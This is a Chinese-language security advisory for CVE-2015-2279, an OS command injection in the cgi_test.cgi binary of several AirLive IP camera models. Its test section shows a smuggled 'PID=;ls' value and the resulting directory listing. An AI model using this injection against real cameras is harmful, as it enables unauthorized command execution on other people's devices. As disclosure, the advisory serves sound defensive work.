发布日期：2015-07-08
更新日期：2015-07-10

受影响系统：

Airlive IP Cameras MD-3025
Airlive IP Cameras BU-3026
Airlive IP Cameras BU-2015

描述：

---

CVE(CAN) ID: CVE-2015-2279

Airlive是IP监控网络解决方案提供商、安全产品厂商。

AirLive MD-3025, BU-3026, BU-2015相机在处理某些参数时，cgi_test.cgi二进制文件中存在OS命令注入漏洞，攻击者通过向该文件发送构造的请求，利用此漏洞可注入任意命令。

<*来源：Core Security
  
  链接：http://www.securityfocus.com/archive/1/535938
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

-c => set system MAC address
-m [MAC] => write MAC address
-n [Model Name] => write Model Name
-h [HW Version] => write HW Version
-v [Firmware Version] => write Firmware Version
-s [SN] => write SN
-t [TAN] => write TAN
-d [PID] => write PID
-r [CR] => write Country Region
-p => show current info.

Content-type: text/html

<body>WRITE_TAN OK, PID=;ls&ls%20-
</body></html>3g.htm
485.htm
SStreamVideo.cab
ado.htm
cfgupgrade.cgi
cgi_test.cgi
client.htm
default.htm
default_else.htm
default_ie.htm
default_m.htm
default_nets.htm
[...]

建议：

---

厂商补丁：

Airlive
-------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.airlivesecurity.com/


[1] http://www.airlive.com.
[2] http://www.airlive.com/product/BU-2015.
[3] http://www.airlive.com/product/MD-3025.
[4] http://www.airlive.com/product/BU-3026.
[5] http://www.airlivecam.eu/manualy/ip_kamery/WL-2000CAM.pdf.
[6] http://www.airlivesecurity.com/product.php?id=5#.

浏览次数：1905
严重程度：0（网友投票）